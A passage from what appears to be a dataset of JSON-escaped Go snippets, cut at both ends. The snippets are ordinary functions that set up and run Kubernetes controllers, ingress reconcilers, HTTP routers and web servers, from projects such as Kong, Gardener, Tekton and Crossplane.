ctrl.Log.WithName(\"controllers\").WithName(\"Ingress\").WithName(\"netv1\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t\tIngressClassName: c.IngressClassName,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.IngressNetV1beta1Enabled,\n\t\t\tController: &configuration.NetV1Beta1IngressReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"Ingress\").WithName(\"netv1beta1\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t\tIngressClassName: c.IngressClassName,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.IngressExtV1beta1Enabled,\n\t\t\tController: &configuration.ExtV1Beta1IngressReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"Ingress\").WithName(\"extv1beta1\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t\tIngressClassName: c.IngressClassName,\n\t\t\t},\n\t\t},\n\n\t\t// ---------------------------------------------------------------------------\n\t\t// Kong API Controllers\n\t\t// ---------------------------------------------------------------------------\n\n\t\t{\n\t\t\tIsEnabled: &c.UDPIngressEnabled,\n\t\t\tController: &kongctrl.KongV1Alpha1UDPIngressReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"UDPIngress\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t\tIngressClassName: c.IngressClassName,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.TCPIngressEnabled,\n\t\t\tController: &kongctrl.KongV1Beta1TCPIngressReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"TCPIngress\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t\tIngressClassName: c.IngressClassName,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.KongIngressEnabled,\n\t\t\tController: &kongctrl.KongV1KongIngressReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"KongIngress\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.KongClusterPluginEnabled,\n\t\t\tController: &kongctrl.KongV1KongClusterPluginReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"KongClusterPlugin\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t\tIngressClassName: c.IngressClassName,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.KongPluginEnabled,\n\t\t\tController: &kongctrl.KongV1KongPluginReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"KongPlugin\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.KongConsumerEnabled,\n\t\t\tController: &kongctrl.KongV1KongConsumerReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"KongConsumer\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t\tIngressClassName: c.IngressClassName,\n\t\t\t},\n\t\t},\n\t}\n\n\tfor _, c := range controllers {\n\t\tif err := c.MaybeSetupWithManager(mgr); err != nil {\n\t\t\treturn fmt.Errorf(\"unable to create controller %q: %w\", c.Name(), err)\n\t\t}\n\t}\n\n\t// BUG: kubebuilder (at the time of writing - 3.0.0-rc.1) does not allow this tag anywhere else than main.go\n\t// See https://github.com/kubernetes-sigs/kubebuilder/issues/932\n\t//+kubebuilder:scaffold:builder\n\n\tif err := mgr.AddHealthzCheck(\"health\", healthz.Ping); err != nil {\n\t\treturn fmt.Errorf(\"unable to setup healthz: %w\", err)\n\t}\n\tif err := mgr.AddReadyzCheck(\"check\", healthz.Ping); err != nil {\n\t\treturn fmt.Errorf(\"unable to setup readyz: %w\", err)\n\t}\n\n\tif c.AnonymousReports {\n\t\tsetupLog.Info(\"running anonymous reports\")\n\t\tif err := mgrutils.RunReport(ctx, kubeconfig, kongConfig, Release); err != nil {\n\t\t\tsetupLog.Error(err, \"anonymous reporting failed\")\n\t\t}\n\t} else {\n\t\tsetupLog.Info(\"anonymous reports disabled, skipping\")\n\t}\n\n\tsetupLog.Info(\"starting manager\")\n\treturn mgr.Start(ctx)\n}", "func main() {\n\t// load environment settings for environment\n\terr := config.ReadConfig(\"config/config.yml\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Load client *service.Client\n\ts := services.NewClient()\n\n\t// load Usecase with client and services\n\tu := usecase.NewUsecase(s)\n\n\t// load controller using usecases\n\tc := controller.NewController(u)\n\n\t// router using controller\n\trouter.NewRouter(c)\n}", "func (c *Controller) Run(ctx context.Context) {\n\n\tgo c.informer.Run(ctx)\n\n\tc.masterLoop()\n}", "func (c *Controller) Run() {\n\tif err := c.wrapper.Run(); err != nil {\n\t\tlogrus.Error(err)\n\t}\n}", "func main() {\n\tapp := newApp()\n\tcontrollers.Setup(app, \"/api\")\n\tapp.Run(ion.Addr(\":8081\"))\n}", "func Run(appCtx app.Context) error {\n\tif err := loadConfig(&appCtx); err != nil {\n\t\treturn err\n\t}\n\tapi, err := makeAPI(appCtx)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn api.Run()\n}", "func (s *TodoService) Run() error {\n\tdefer s.Db.Close()\n\n\t// Build Resource\n\tresource := &TodoResource{Db: s.Db}\n\n\t// Wire Routes\n\tr := mux.NewRouter()\n\tr.HandleFunc(\"/health\", resource.Health).Methods(\"GET\")\n\tr.HandleFunc(\"/todo\", resource.Add).Methods(\"POST\")\n\tr.HandleFunc(\"/todo\", resource.GetAll).Methods(\"GET\")\n\tr.HandleFunc(\"/todo/{id}\", resource.Get).Methods(\"GET\")\n\tr.HandleFunc(\"/todo/{id}\", resource.Update).Methods(\"PUT\")\n\tr.HandleFunc(\"/todo/{id}\", resource.Delete).Methods(\"DELETE\")\n\n\thttp.Handle(\"/\", r)\n\n\t// Start Server\n\terr := s.Server.Start()\n\n\tlog.Println(\"Server Stopped\")\n\treturn err\n}", "func (f *GardenControllerFactory) Run(ctx context.Context) error {\n\tlog := logf.Log.WithName(\"controller\")\n\n\tgardenClientSet, err := f.clientMap.GetClient(ctx, keys.ForGarden())\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to get garden client: %+v\", err)\n\t}\n\n\tif err := addAllFieldIndexes(ctx, gardenClientSet.Cache()); err != nil {\n\t\treturn err\n\t}\n\n\tif err := f.clientMap.Start(ctx.Done()); err != nil {\n\t\treturn fmt.Errorf(\"failed to start ClientMap: %+v\", err)\n\t}\n\n\truntime.Must(garden.BootstrapCluster(ctx, gardenClientSet))\n\tlog.Info(\"Successfully bootstrapped Garden cluster\")\n\n\t// Create controllers.\n\tbastionController, err := bastioncontroller.NewBastionController(ctx, log, f.clientMap, f.cfg.Controllers.Bastion.MaxLifetime.Duration)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Bastion controller: %w\", err)\n\t}\n\n\tcloudProfileController, err := cloudprofilecontroller.NewCloudProfileController(ctx, log, f.clientMap, f.recorder)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing CloudProfile controller: %w\", err)\n\t}\n\n\tcontrollerDeploymentController, err := controllerdeploymentcontroller.New(ctx, log, f.clientMap)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing ControllerDeployment controller: %w\", err)\n\t}\n\n\tcontrollerRegistrationController, err := controllerregistrationcontroller.NewController(ctx, log, f.clientMap)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing ControllerRegistration controller: %w\", err)\n\t}\n\n\tcsrController, err := csrcontroller.NewCSRController(ctx, log, f.clientMap)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing CSR controller: %w\", err)\n\t}\n\n\texposureClassController, err := exposureclasscontroller.NewExposureClassController(ctx, f.clientMap, f.recorder)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing ExposureClass controller: %w\", err)\n\t}\n\n\tplantController, err := plantcontroller.NewController(ctx, f.clientMap, f.cfg)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Plant controller: %w\", err)\n\t}\n\n\tprojectController, err := projectcontroller.NewProjectController(ctx, f.clientMap, f.cfg, f.recorder)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Project controller: %w\", err)\n\t}\n\n\tquotaController, err := quotacontroller.NewQuotaController(ctx, f.clientMap, f.recorder)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Quota controller: %w\", err)\n\t}\n\n\tsecretBindingController, err := secretbindingcontroller.NewSecretBindingController(ctx, f.clientMap, f.recorder)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing SecretBinding controller: %w\", err)\n\t}\n\n\tseedController, err := seedcontroller.NewSeedController(ctx, f.clientMap, f.cfg)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Seed controller: %w\", err)\n\t}\n\n\tshootController, err := shootcontroller.NewShootController(ctx, f.clientMap, f.cfg, f.recorder)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Shoot controller: %w\", err)\n\t}\n\n\tmanagedSeedSetController, err := managedseedsetcontroller.NewManagedSeedSetController(ctx, f.clientMap, f.cfg, f.recorder, logger.Logger)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing ManagedSeedSet controller: %w\", err)\n\t}\n\n\tgo bastionController.Run(ctx, f.cfg.Controllers.Bastion.ConcurrentSyncs)\n\tgo cloudProfileController.Run(ctx, f.cfg.Controllers.CloudProfile.ConcurrentSyncs)\n\tgo controllerDeploymentController.Run(ctx, f.cfg.Controllers.ControllerDeployment.ConcurrentSyncs)\n\tgo controllerRegistrationController.Run(ctx, f.cfg.Controllers.ControllerRegistration.ConcurrentSyncs)\n\tgo csrController.Run(ctx, 1)\n\tgo plantController.Run(ctx, f.cfg.Controllers.Plant.ConcurrentSyncs)\n\tgo projectController.Run(ctx, f.cfg.Controllers.Project.ConcurrentSyncs)\n\tgo quotaController.Run(ctx, f.cfg.Controllers.Quota.ConcurrentSyncs)\n\tgo secretBindingController.Run(ctx, f.cfg.Controllers.SecretBinding.ConcurrentSyncs, f.cfg.Controllers.SecretBindingProvider.ConcurrentSyncs)\n\tgo seedController.Run(ctx, f.cfg.Controllers.Seed.ConcurrentSyncs)\n\tgo shootController.Run(ctx, f.cfg.Controllers.ShootMaintenance.ConcurrentSyncs, f.cfg.Controllers.ShootQuota.ConcurrentSyncs, f.cfg.Controllers.ShootHibernation.ConcurrentSyncs, f.cfg.Controllers.ShootReference.ConcurrentSyncs, f.cfg.Controllers.ShootRetry.ConcurrentSyncs, f.cfg.Controllers.ShootConditions.ConcurrentSyncs, f.cfg.Controllers.ShootStatusLabel.ConcurrentSyncs)\n\tgo exposureClassController.Run(ctx, f.cfg.Controllers.ExposureClass.ConcurrentSyncs)\n\tgo managedSeedSetController.Run(ctx, f.cfg.Controllers.ManagedSeedSet.ConcurrentSyncs)\n\n\tif eventControllerConfig := f.cfg.Controllers.Event; eventControllerConfig != nil {\n\t\teventController, err := eventcontroller.NewController(ctx, f.clientMap, eventControllerConfig)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"failed initializing Event controller: %w\", err)\n\t\t}\n\n\t\tgo eventController.Run(ctx)\n\t}\n\n\tlog.Info(\"gardener-controller-manager initialized\")\n\n\t// Shutdown handling\n\t<-ctx.Done()\n\n\tlog.Info(\"I have received a stop signal and will no longer watch resources\")\n\tlog.Info(\"Bye Bye!\")\n\n\treturn nil\n}", "func RunController(opts *Options, stopCh <-chan struct{}) error {\n\n\tinfo := version.Get()\n\tlog.Noticef(\"Controller Build Information %v\", info.Pretty())\n\n\tlog.Info(\"Controller Running with\", log.Fields{\n\t\t\"debug\": opts.Debug,\n\t\t\"kubconfig\": opts.Kubeconfig,\n\t})\n\n\tif opts.Debug {\n\t\tlog.ApplyOptions(log.DebugLevel)\n\t} else {\n\t\tlog.ApplyOptions(log.InfoLevel)\n\t}\n\n\t// build config\n\tlog.Infof(\"load kubeconfig from %s\", opts.Kubeconfig)\n\tconfig, err := clientcmd.BuildConfigFromFlags(\"\", opts.Kubeconfig)\n\tif err != nil {\n\t\tlog.Fatal(\"Create kubeconfig error\", log.Fields{\"err\": err})\n\t\treturn err\n\t}\n\n\t// create clientset\n\topts.Cfg.Client = kubernetes.NewForConfigOrDie(config)\n\n\t// start a controller on instances of lb\n\tcontroller := crcontroller.NewCanaryReleaseController(opts.Cfg)\n\n\tcontroller.Run(5, stopCh)\n\n\treturn nil\n}", "func Run(c *config.Config, stopCh <-chan struct{}) error {\n\tklog.Info(version.Get().Pretty())\n\tklog.Infof(\"Controller Running with additionalTolerations %v\", c.Cfg.AdditionalTolerations)\n\n\t// start a controller on instances of lb\n\tcontroller := lbcontroller.NewLoadBalancerController(c.Cfg)\n\tcontroller.Run(5, stopCh)\n\n\treturn nil\n}", "func (ctrl *SeederController) Run(c *gin.Context) {\n\tseeds.Run()\n\n\tc.String(http.StatusOK, \"complete \"+time.Now().Format(\"2006-01-02 15:04:05\"))\n}", "func Run(ctx context.Context) error {\n\trouter := Router(ctx)\n\n\tviews.Routes(router)\n\n\trouter.Run(fmt.Sprintf(\":%d\", config.FromContext(ctx).Server.Port))\n\n\treturn nil\n}", "func (c *RouterController) Run() {\n\tglog.V(4).Info(\"Running router controller\")\n\tgo util.Forever(c.HandleRoute, 0)\n\tgo util.Forever(c.HandleEndpoints, 0)\n}", "func (api *API) Run() {\n\tr := gin.Default()\n\n\tapi.configRoutes(r)\n\n\tr.Run() // listen and serve on 0.0.0.0:8080 (for windows \"localhost:8080\")\n}", "func (f *LegacyControllerFactory) Start(ctx context.Context) error {\n\tlog := f.Log.WithName(\"controller\")\n\n\tkubernetesClient, err := kubernetesclientset.NewForConfig(f.RESTConfig)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed creating kubernetes client: %w\", err)\n\t}\n\n\t// create controllers\n\tcontrollerRegistrationController, err := controllerregistrationcontroller.NewController(ctx, log, f.Manager)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing ControllerRegistration controller: %w\", err)\n\t}\n\n\tcsrController, err := csrcontroller.NewCSRController(ctx, log, f.Manager, kubernetesClient)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing CSR controller: %w\", err)\n\t}\n\n\tmanagedSeedSetController, err := managedseedsetcontroller.NewManagedSeedSetController(ctx, log, f.Manager, f.Config)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing ManagedSeedSet controller: %w\", err)\n\t}\n\n\tprojectController, err := projectcontroller.NewProjectController(ctx, log, f.Manager, f.Config)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Project controller: %w\", err)\n\t}\n\n\tsecretBindingController, err := secretbindingcontroller.NewSecretBindingController(ctx, log, f.Manager)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing SecretBinding controller: %w\", err)\n\t}\n\n\tseedController, err := seedcontroller.NewSeedController(ctx, log, f.Manager, f.Config)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Seed controller: %w\", err)\n\t}\n\n\tshootController, err := shootcontroller.NewShootController(ctx, log, f.Manager, f.Config)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed initializing Shoot controller: %w\", err)\n\t}\n\n\t// run controllers\n\tgo controllerRegistrationController.Run(ctx, *f.Config.Controllers.ControllerRegistration.ConcurrentSyncs)\n\tgo csrController.Run(ctx, 1)\n\tgo projectController.Run(ctx, *f.Config.Controllers.Project.ConcurrentSyncs)\n\tgo secretBindingController.Run(ctx, *f.Config.Controllers.SecretBinding.ConcurrentSyncs)\n\tgo seedController.Run(ctx, *f.Config.Controllers.Seed.ConcurrentSyncs, *f.Config.Controllers.SeedExtensionsCheck.ConcurrentSyncs)\n\tgo shootController.Run(ctx, *f.Config.Controllers.ShootMaintenance.ConcurrentSyncs, *f.Config.Controllers.ShootQuota.ConcurrentSyncs, *f.Config.Controllers.ShootHibernation.ConcurrentSyncs, *f.Config.Controllers.ShootReference.ConcurrentSyncs, *f.Config.Controllers.ShootRetry.ConcurrentSyncs, *f.Config.Controllers.ShootConditions.ConcurrentSyncs, *f.Config.Controllers.ShootStatusLabel.ConcurrentSyncs)\n\tgo managedSeedSetController.Run(ctx, *f.Config.Controllers.ManagedSeedSet.ConcurrentSyncs)\n\n\t// block until shutting down\n\t<-ctx.Done()\n\treturn nil\n}", "func main() {\n\tstories, err := reader.ReadJsonStory(\"./static/story/default.json\")\n\tif err != nil {\n\t\tlog.Panicln(err)\n\t}\n\n\tweb.Start(stories)\n}", "func (api *API) Run() error {\n\treturn api.startServe()\n}", "func TestController(t *testing.T) {\n\tctx, _ := rtesting.SetupFakeContext(t)\n\tctx, cancel := context.WithTimeout(ctx, 30*time.Second)\n\tdefer cancel()\n\n\t// Create reconcilers, start controller.\n\tresults := test.NewResultsClient(t)\n\n\ttrctrl := taskrun.NewController(ctx, results)\n\tprctrl := pipelinerun.NewController(ctx, results)\n\tgo controller.StartAll(ctx, trctrl, prctrl)\n\n\t// Start informers - this notifies the controller of new events.\n\tgo taskruninformer.Get(ctx).Informer().Run(ctx.Done())\n\tgo pipelineruninformer.Get(ctx).Informer().Run(ctx.Done())\n\n\tpipeline := fakepipelineclient.Get(ctx)\n\tt.Run(\"taskrun\", func(t *testing.T) {\n\t\ttr := &v1beta1.TaskRun{\n\t\t\tTypeMeta: metav1.TypeMeta{\n\t\t\t\tAPIVersion: \"tekton.dev/v1beta1\",\n\t\t\t\tKind: \"TaskRun\",\n\t\t\t},\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: \"taskrun\",\n\t\t\t\tNamespace: \"ns\",\n\t\t\t\tAnnotations: map[string]string{\n\t\t\t\t\t\"demo\": \"demo\",\n\t\t\t\t\t// This TaskRun belongs to a PipelineRun, so the record should\n\t\t\t\t\t// be associated with the PipelineRun result.\n\t\t\t\t\t\"tekton.dev/pipelineRun\": \"pr\",\n\t\t\t\t},\n\t\t\t\tOwnerReferences: []metav1.OwnerReference{{\n\t\t\t\t\tAPIVersion: \"tekton.dev/v1beta1\",\n\t\t\t\t\tKind: \"PipelineRun\",\n\t\t\t\t\tUID: \"pr-id\",\n\t\t\t\t}},\n\t\t\t\tUID: \"tr-id\",\n\t\t\t},\n\t\t}\n\n\t\t// The following is a hack to make the fake clients play nice with\n\t\t// each other. While the controller uses the typed informer that uses\n\t\t// the fake pipeline client to receive events, the controller uses the\n\t\t// fake dynamic client to fetch and update objects during reconcile.\n\t\t// These fake clients store objects independently, so we create the\n\t\t// object in each client to make sure the data is populated in both\n\t\t// places.\n\t\tif _, err := pipeline.TektonV1beta1().TaskRuns(tr.GetNamespace()).Create(tr); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t\tdata, err := runtime.DefaultUnstructuredConverter.ToUnstructured(tr)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"ToUnstructured: %v\", err)\n\t\t}\n\t\t_, err = dynamicinject.Get(ctx).Resource(apis.KindToResource(tr.GroupVersionKind())).Namespace(tr.GetNamespace()).Create(&unstructured.Unstructured{Object: data}, metav1.CreateOptions{})\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Create: %v\", err)\n\t\t}\n\n\t\twait(ctx, t, tr, \"ns/results/pr-id\")\n\t})\n\n\tt.Run(\"pipelinerun\", func(t *testing.T) {\n\t\tpr := &v1beta1.PipelineRun{\n\t\t\tTypeMeta: metav1.TypeMeta{\n\t\t\t\tAPIVersion: \"tekton.dev/v1beta1\",\n\t\t\t\tKind: \"PipelineRun\",\n\t\t\t},\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: \"pr\",\n\t\t\t\tNamespace: \"ns\",\n\t\t\t\tAnnotations: map[string]string{\"demo\": \"demo\"},\n\t\t\t\tUID: \"pr-id\",\n\t\t\t},\n\t\t}\n\n\t\t// Same create hack as taskrun (see above).\n\t\tif _, err := pipeline.TektonV1beta1().PipelineRuns(pr.GetNamespace()).Create(pr); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t\tdata, err := runtime.DefaultUnstructuredConverter.ToUnstructured(pr)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"ToUnstructured: %v\", err)\n\t\t}\n\t\t_, err = dynamicinject.Get(ctx).Resource(apis.KindToResource(pr.GroupVersionKind())).Namespace(pr.GetNamespace()).Create(&unstructured.Unstructured{Object: data}, metav1.CreateOptions{})\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Create: %v\", err)\n\t\t}\n\n\t\twait(ctx, t, pr, \"ns/results/pr-id\")\n\t})\n}", "func main() {\n\tConf.LoadConfigs()\n\tif Conf.Role == \"ctrl\" {\n\t\tcontroller.RunController()\n\t} else if Conf.Role == \"svr\" {\n\t\tidx, _ := strconv.Atoi(Conf.Id)\n\t\tRunServer(uint32(idx))\n\t} else if Conf.Role == \"cli\" {\n\t\tidx, _ := strconv.Atoi(Conf.Id)\n\t\tRunClient(uint32(idx))\n\t} else {\n\t\tpanic(\"should not happen, error Conf.Role\")\n\t}\n}", "func TestController(t *testing.T) {\n\tsuite.Run(t, new(ControllerTestSuite))\n}", "func Run() {\n\tEngine.Run(config.RestEndpoint)\n}", "func (b *Builder) Run(p *Project) error {\n\tvar err error\n\tb.restarter.Invoke(func(ctx context.Context) {\n\t\terr = b.work(ctx, p)\n\t})\n\n\treturn err\n}", "func (a *API) Run() error {\n\treturn a.e.Start(a.addr)\n}", "func main(){\n\tr := ctrl.HttpRouter()\n\tr.Run(\":1234\")\n}", "func Run() {\n\n\tgo func() {\n\t\terrors := setupTemplates(\"server/templates\")\n\t\tif errors != nil {\n\t\t\tfmt.Println(errors)\n\t\t}\n\t}()\n\n\tfmt.Println(\"Starting server...\")\n\thttp.HandleFunc(\"/\", index)\n\thttp.HandleFunc(\"/view\", view)\n\thttp.Handle(\"/static/\", http.StripPrefix(\"/static/\", http.FileServer(http.Dir(\"server/static/\"))))\n\thttp.ListenAndServe(\":8080\", nil)\n}", "func (c *Command) Run(s *runtime.Scheme, log logging.Logger) error {\n\tcfg, err := ctrl.GetConfig()\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"Cannot get config\")\n\t}\n\tlog.Debug(\"Starting\", \"sync-period\", c.Sync.String())\n\n\tmgr, err := ctrl.NewManager(cfg, ctrl.Options{\n\t\tScheme: s,\n\t\tLeaderElection: c.LeaderElection,\n\t\tLeaderElectionID: \"crossplane-leader-election-core\",\n\t\tSyncPeriod: &c.Sync,\n\t})\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"Cannot create manager\")\n\t}\n\n\tif err := apiextensions.Setup(mgr, log); err != nil {\n\t\treturn errors.Wrap(err, \"Cannot setup API extension controllers\")\n\t}\n\n\tpkgCache := xpkg.NewImageCache(c.CacheDir, afero.NewOsFs())\n\n\tif err := pkg.Setup(mgr, log, pkgCache, c.Namespace); err != nil {\n\t\treturn errors.Wrap(err, \"Cannot add packages controllers to manager\")\n\t}\n\n\treturn errors.Wrap(mgr.Start(ctrl.SetupSignalHandler()), \"Cannot start controller manager\")\n}", "func (lbc *loadBalancerController) Run(provider lbprovider.LBProvider) {\n\tlogrus.Infof(\"starting kubernetes-ingress-controller\")\n\tgo lbc.ingController.Run(lbc.stopCh)\n\tgo lbc.endpController.Run(lbc.stopCh)\n\tgo lbc.svcController.Run(lbc.stopCh)\n\n\tgo lbc.syncQueue.Run(time.Second, lbc.stopCh)\n\tgo lbc.ingQueue.Run(time.Second, lbc.stopCh)\n\tgo lbc.cleanupQueue.Run(time.Second, lbc.stopCh)\n\n\tlbc.lbProvider = provider\n\tgo lbc.lbProvider.Run(utils.NewTaskQueue(lbc.updateIngressStatus))\n\n\t<-lbc.stopCh\n\tlogrus.Infof(\"shutting down kubernetes-ingress-controller\")\n}", "func main() {\n\t// Init close channel used to stop the example.\n\texampleFinished := make(chan struct{}, 1)\n\n\t// Start Agent with ExamplePlugin, REST, prometheus plugin & FlavorLocal (reused cn-infra plugins).\n\tagent := local.NewAgent(local.WithPlugins(func(flavor *local.FlavorLocal) []*core.NamedPlugin {\n\t\thttpPlugin := &rest.Plugin{}\n\n\t\trest.DeclareHTTPPortFlag(\"http\")\n\t\thttpPlugDeps := *flavor.InfraDeps(\"http\", local.WithConf())\n\t\thttpPlugin.Deps.Log = httpPlugDeps.Log\n\t\thttpPlugin.Deps.PluginConfig = httpPlugDeps.PluginConfig\n\t\thttpPlugin.Deps.PluginName = httpPlugDeps.PluginName\n\n\t\tprometheusPlugin := &prom.Plugin{}\n\t\tprometheusPlugin.Deps.PluginInfraDeps = *flavor.InfraDeps(\"prometheus\")\n\t\tprometheusPlugin.Deps.HTTP = httpPlugin\n\n\t\texamplePlug := &ExamplePlugin{}\n\t\texamplePlug.Deps.PluginInfraDeps = *flavor.InfraDeps(\"prometheus-example\")\n\t\texamplePlug.Deps.Prometheus = prometheusPlugin\n\n\t\treturn []*core.NamedPlugin{\n\t\t\t{httpPlugin.PluginName, httpPlugin},\n\t\t\t{prometheusPlugin.PluginName, prometheusPlugin},\n\t\t\t{examplePlug.PluginName, examplePlug}}\n\t}))\n\tcore.EventLoopWithInterrupt(agent, exampleFinished)\n}", "func (r *RootResolver) RunExampleResolver(ctx context.Context) {\r\n\t// Prepare args\r\n\treq := handlers.MustNewReader(&OnboardStartRequest{})\r\n\tresp := &bytes.Buffer{}\r\n\r\n\t// Prepare func\r\n\tfn := handlers.WithLogging(handlers.WithMetrics(\"start\", r.Calls, r.Errors, r.Saturation, r.Duration, OnboardStart(r.userStore, r.accountStore)))\r\n\r\n\t// Execute func and handle errors\r\n\terr := fn(ctx, resp, req)\r\n\tvar userErr *handlers.UserError\r\n\tvar sysErr *handlers.SystemError\r\n\tif errors.As(err, &userErr) {\r\n\t\tfmt.Println(\"Input Error:\", userErr.Message)\r\n\t\treturn\r\n\t}\r\n\tif errors.As(err, &sysErr) {\r\n\t\tfmt.Println(\"Internal Error\")\r\n\t\treturn\r\n\t}\r\n\r\n}", "func NewController(factory k8s.ClientFactory) *Controller {\n\tpipelineRunInformer := factory.StewardInformerFactory().Steward().V1alpha1().PipelineRuns()\n\tpipelineRunLister := pipelineRunInformer.Lister()\n\tpipelineRunFetcher := k8s.NewListerBasedPipelineRunFetcher(pipelineRunInformer.Lister())\n\ttektonTaskRunInformer := factory.TektonInformerFactory().Tekton().V1beta1().TaskRuns()\n\teventBroadcaster := record.NewBroadcaster()\n\teventBroadcaster.StartLogging(klog.V(3).Infof)\n\teventBroadcaster.StartRecordingToSink(&typedcorev1.EventSinkImpl{Interface: factory.CoreV1().Events(\"\")})\n\trecorder := eventBroadcaster.NewRecorder(scheme.Scheme, corev1.EventSource{Component: \"runController\"})\n\n\tcontroller := &Controller{\n\t\tfactory: factory,\n\t\tpipelineRunFetcher: pipelineRunFetcher,\n\t\tpipelineRunLister: pipelineRunLister,\n\t\tpipelineRunSynced: pipelineRunInformer.Informer().HasSynced,\n\n\t\ttektonTaskRunsSynced: tektonTaskRunInformer.Informer().HasSynced,\n\t\tworkqueue: workqueue.NewNamedRateLimitingQueue(workqueue.DefaultControllerRateLimiter(), metrics.WorkqueueName),\n\t\trecorder: recorder,\n\t\tpipelineRunStore: pipelineRunInformer.Informer().GetStore(),\n\t}\n\tpipelineRunInformer.Informer().AddEventHandler(cache.ResourceEventHandlerFuncs{\n\t\tAddFunc: controller.addPipelineRun,\n\t\tUpdateFunc: func(old, new interface{}) {\n\t\t\tcontroller.addPipelineRun(new)\n\t\t},\n\t})\n\ttektonTaskRunInformer.Informer().AddEventHandler(cache.ResourceEventHandlerFuncs{\n\t\tAddFunc: controller.handleTektonTaskRun,\n\t\tUpdateFunc: func(old, new interface{}) {\n\t\t\tcontroller.handleTektonTaskRun(new)\n\t\t},\n\t})\n\n\treturn controller\n}", "func Run(cfg cli.Config) {\n\tstatikFS, _ := fs.New()\n\trouter := mux.NewRouter().StrictSlash(true)\n\troutes := []Route{\n\t\t{\n\t\t\t\"API\",\n\t\t\t\"GET\",\n\t\t\t\"/api/{name}\",\n\t\t\tAPIWrapper(API, cfg),\n\t\t},\n\t}\n\n\tfor _, route := range routes {\n\t\trouter.\n\t\t\tPath(route.Path).\n\t\t\tMethods(route.Method).\n\t\t\tName(route.Name).\n\t\t\tHandler(route.HandlerFunc)\n\t}\n\trouter.PathPrefix(\"/\").Handler(http.FileServer(statikFS))\n\terr := http.ListenAndServe(fmt.Sprintf(\"%s:%d\", cfg.Web.Address, cfg.Web.Port), router)\n\tif err != nil {\n\t\tprintln(err.Error())\n\t}\n}", "func Run(params *ContextParams) {\n\tr := createRouter(params)\n\n\tendless.DefaultHammerTime = 10 * time.Second\n\tendless.DefaultReadTimeOut = 295 * time.Second\n\tif err := endless.ListenAndServe(\":8080\", r); err != nil {\n\t\tlog.Infof(\"Server 